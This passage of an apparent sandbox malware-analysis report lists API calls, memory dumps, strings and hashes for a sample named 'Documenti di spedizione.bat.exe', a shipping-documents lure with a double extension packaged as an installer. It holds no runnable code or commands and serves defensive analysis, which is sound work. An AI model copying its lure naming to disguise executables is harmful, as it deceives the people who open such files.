                                            APIs
                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
                                            • Instruction ID: 6696c5b565abb4b072559f1c40de02a1b67f072cada9199909c9bbabd3d4a8ec
                                            • Opcode Fuzzy Hash: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
                                            • Instruction Fuzzy Hash: 1CD05EB3B14141ABDB20EBB8BAC445E77E4EB403257304837E502E2091E6798A428618
                                            APIs
                                            • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                            • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                            • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                            • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404AA5
                                            • GetDlgItem.USER32(?,00000408), ref: 00404AB0
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
                                            • LoadBitmapA.USER32(0000006E), ref: 00404B0D
                                            • SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
                                            • DeleteObject.GDI32(00000000), ref: 00404B83
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
                                            • ShowWindow.USER32(?,00000005), ref: 00404CDC
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404EAC
                                            • GlobalFree.KERNEL32(00000000), ref: 00404EBC
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
                                            • ShowWindow.USER32(?,00000000), ref: 0040505B
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405066
                                            • ShowWindow.USER32(00000000), ref: 0040506D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N$-L
                                            • API String ID: 1638840714-202795196
                                            • Opcode ID: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
                                            • Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
                                            • Opcode Fuzzy Hash: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
                                            • Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404569
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404593
                                            • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
                                            • CoTaskMemFree.OLE32(00000000), ref: 0040464F
                                            • lstrcmpiA.KERNEL32(Call,Gazi Setup: Installing), ref: 00404681
                                            • lstrcatA.KERNEL32(?,Call), ref: 0040468D
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F
                                              • Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4
                                              • Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
                                              • Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                              • Part of subcall function 00406162: CharNextA.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
                                              • Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC
                                            • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778
                                              • Part of subcall function 004048D1: lstrlenA.KERNEL32(Gazi Setup: Installing,Gazi Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                              • Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
                                              • Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,Gazi Setup: Installing), ref: 0040498A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$Call$Gazi Setup: Installing$dK$-L
                                            • API String ID: 2624150263-2479613484
                                            • Opcode ID: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
                                            • Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
                                            • Opcode Fuzzy Hash: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
                                            • Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004042C4
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
                                            • GetSysColor.USER32(?), ref: 004042F3
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
                                            • lstrlenA.KERNEL32(?), ref: 00404314
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404338
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040439A
                                            • SendMessageA.USER32(00000000), ref: 0040439D
                                            • GetDlgItem.USER32(?,000003E8), ref: 004043C8
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00404417
                                            • SetCursor.USER32(00000000), ref: 00404420
                                            • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404440
                                            • SetCursor.USER32(00000000), ref: 00404443
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: Call$N$dK$open$-L
                                            • API String ID: 3615053054-3822709895
                                            • Opcode ID: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                            • Instruction ID: 93f755629d35b640548b5af6b7c61ab120d2ba211fed136cde477a70902604c8
                                            • Opcode Fuzzy Hash: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                            • Instruction Fuzzy Hash: 5D61A3B1A40209BFEB109F61DC45F6A7B69FB84714F10803AFB057A2D1C7B8A951CF99
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                            • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                            • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                            • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                            APIs
                                            • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
                                            • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C
                                              • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                              • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                            • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
                                            • wsprintfA.USER32 ref: 00405CB7
                                            • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
                                            • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
                                            • GlobalFree.KERNEL32(00000000), ref: 00405DA0
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7
                                              • Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00405B6E
                                              • Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                            • String ID: %s=%s$NUL$[Rename]
                                            • API String ID: 222337774-4148678300
                                            • Opcode ID: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
                                            • Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
                                            • Opcode Fuzzy Hash: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
                                            • Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD
                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
                                            • CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
                                            • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406163
                                            • "C:\Users\user\Desktop\Documenti di spedizione.bat.exe", xrefs: 0040619E
                                            • *?|<>/":, xrefs: 004061AA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-1580819208
                                            • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                            • Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
                                            • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                            • Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 00404160
                                            • GetSysColor.USER32(00000000), ref: 0040417C
                                            • SetTextColor.GDI32(?,00000000), ref: 00404188
                                            • SetBkMode.GDI32(?,?), ref: 00404194
                                            • GetSysColor.USER32(?), ref: 004041A7
                                            • SetBkColor.GDI32(?,?), ref: 004041B7
                                            • DeleteObject.GDI32(?), ref: 004041D1
                                            • CreateBrushIndirect.GDI32(?), ref: 004041DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                            • Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                            • Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                            • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                            • String ID:
                                            • API String ID: 3730416702-0
                                            • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                            • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                            • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                            • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                            APIs
                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            • GlobalFree.KERNEL32(?), ref: 100024B5
                                            • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                            • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                            • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                            • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402CC3
                                            • GetTickCount.KERNEL32 ref: 00402CE1
                                            • wsprintfA.USER32 ref: 00402D0F
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
